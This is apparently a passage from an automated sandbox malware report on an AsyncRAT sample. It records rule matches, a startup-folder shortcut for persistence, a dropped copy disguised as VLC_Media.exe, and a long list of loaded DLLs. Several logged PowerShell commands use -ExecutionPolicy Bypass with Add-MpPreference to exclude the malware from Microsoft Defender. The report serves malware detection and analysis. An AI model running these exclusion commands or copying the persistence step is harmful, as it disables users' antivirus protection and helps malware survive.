                            Source: C:\Users\user\Desktop\18fvs4AVae.exeCode function: 0_2_00007FFD9B8966620_2_00007FFD9B896662
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeCode function: 0_2_00007FFD9B8906100_2_00007FFD9B890610
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeCode function: 0_2_00007FFD9B8958B60_2_00007FFD9B8958B6
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeCode function: 0_2_00007FFD9B8994200_2_00007FFD9B899420
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8820DD1_2_00007FFD9B8820DD
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B890E9D4_2_00007FFD9B890E9D
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B8920FA4_2_00007FFD9B8920FA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B962E114_2_00007FFD9B962E11
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFD9B8B21FA9_2_00007FFD9B8B21FA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8A1FFA11_2_00007FFD9B8A1FFA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B8A13DD11_2_00007FFD9B8A13DD
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B9730E911_2_00007FFD9B9730E9
                            Source: 18fvs4AVae.exe, 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 18fvs4AVae.exe
                            Source: 18fvs4AVae.exeBinary or memory string: OriginalFilenameXClient.exe4 vs 18fvs4AVae.exe
                            Source: 18fvs4AVae.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 18fvs4AVae.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 0.0.18fvs4AVae.exe.480000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 00000000.00000000.1683273081.0000000000482000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: C:\ProgramData\VLC_Media.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                            Source: 18fvs4AVae.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 18fvs4AVae.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: 18fvs4AVae.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: VLC_Media.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: VLC_Media.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                            Source: VLC_Media.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                            Source: VLC_Media.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: VLC_Media.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 18fvs4AVae.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 18fvs4AVae.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/20@1/2
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VLC_Media.lnkJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeMutant created: \Sessions\1\BaseNamedObjects\kkeD0iZ90XXPXCyz
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2000:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                            Source: 18fvs4AVae.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 18fvs4AVae.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: 18fvs4AVae.exeReversingLabs: Detection: 78%
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeFile read: C:\Users\user\Desktop\18fvs4AVae.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\18fvs4AVae.exe "C:\Users\user\Desktop\18fvs4AVae.exe"
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\18fvs4AVae.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '18fvs4AVae.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\VLC_Media.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VLC_Media.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\18fvs4AVae.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
